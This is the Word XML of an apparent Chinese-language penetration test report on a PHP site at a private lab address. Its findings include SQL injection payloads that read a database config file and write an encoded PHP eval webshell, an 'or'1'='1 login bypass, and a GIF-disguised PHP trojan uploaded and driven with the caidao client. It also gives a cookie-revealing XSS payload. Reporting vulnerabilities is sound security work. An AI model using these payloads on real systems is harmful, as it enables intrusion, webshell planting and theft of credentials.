        <w:t>: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>http://192.168.203.144/storypage_04.php?id=115 and%201=2%20union%20select%20load_file%280x2f7661722f7777772f636f6e6669672f6462636f6e662e706870%29,2,3,4,5,6,7,8,9,10,11,12,13--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars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EastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>根目录写入文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.203.144/storypage_04.php?id=115 and 1=2 union select char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,39,115,104,97,99,107,39,93,41,59,63,62),2,3,4,5,6,7,8,9,10,11,12,13 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/www/zm.php'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc532983544"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>物理路径暴露漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00275046" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00DF6D4E" w:rsidRPr="00C72D46">
          <w:rPr>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.203.144/test.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:wordWrap w:val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442335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715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C8F52.tmp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Pr="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc532983545"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>后台登陆绕过（实际上也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>注入）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/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后台登陆地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00275046" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00DF6D4E" w:rsidRPr="00C72D46">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.203.144/back/</w:t>
        </w:r>
      </w:hyperlink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可输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>，密码</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3449955"/>
            <wp:effectExtent l="0" t="0" r="2540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EC6DB.tmp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Default="00DF6D4E" w:rsidP="00DF6D4E"/>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc532983546"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>任意文件上传漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/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后台管理系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>首页管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>功能中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>新增大图</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>存在任意文件上传漏洞，可以直接上传</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>文件，但是该上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>传功能</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>会检测图片格式，所以需要将一句话木马</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>附加在正常的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gif.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的后面。打开命令提示符</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>切换到一句话木马和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>图片所在的目录，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>如下命令即可生成一个可上传的一句话木马</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ne.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> gif.gif+1.php one.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>后台管理系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>首页管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>中，点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>新增大图</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>按钮，选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>one.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>上传，可以上传成功，在列表中找到刚刚上传的那条，点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>，可以看到刚刚上传的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>，在图片上点击右键，可查看该</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>的链接地址，可以看到是以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>为后缀名的，说明一句话木马上传成功，一句话木马的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>形式类似于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00275046" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00DF6D4E" w:rsidRPr="00C72D46">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.203.144/back/upload/banner_58.php</w:t>
        </w:r>
      </w:hyperlink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将一句话木马的链接添加到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>caidao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>即可得到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4325620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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EC6CA0.tmp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Default="00DF6D4E" w:rsidP="00DF6D4E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3045460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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EC642B.tmp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Pr="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00A45CF9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc532983547"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>执行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6D4E">
        <w:t>）漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/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后台管理系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>园区公告管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>功能，新增公告，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>首页摘要</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>字段添加以下内容可验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>执行漏洞：</w:t>
      </w:r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&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00C72D46" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>验证脚本的功能为弹出用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>值。利用此漏洞可获取用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72D46">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>值，从而获取登录权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6D4E" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3825875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175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EC38D7.tmp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4E" w:rsidRPr="00764E0B" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E"/>
    <w:p w:rsidR="00DF6D4E" w:rsidRPr="00E96E03" w:rsidRDefault="00DF6D4E" w:rsidP="00DF6D4E">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DF6D4E" w:rsidRPr="00E96E03" w:rsidSect="00041B0F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90" w:rsidRDefault="009C2A90" w:rsidP="00831426">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C2A90" w:rsidRDefault="009C2A90" w:rsidP="0083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1A" w:rsidRDefault="0072691A">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00275046">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00275046">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00AD30F5">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="0027504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b/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r w:rsidR="005A23C7">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="0072691A" w:rsidRDefault="00726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90" w:rsidRDefault="009C2A90" w:rsidP="00831426">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009C2A90" w:rsidRDefault="009C2A90" w:rsidP="0083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3B" w:rsidRDefault="002750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7090" o:spid="_x0000_s1032" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:526.9pt;height:58.5pt;rotation:315;z-index:-251641856;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#ddd" stroked="f">
          <v:fill opacity=".5"/>
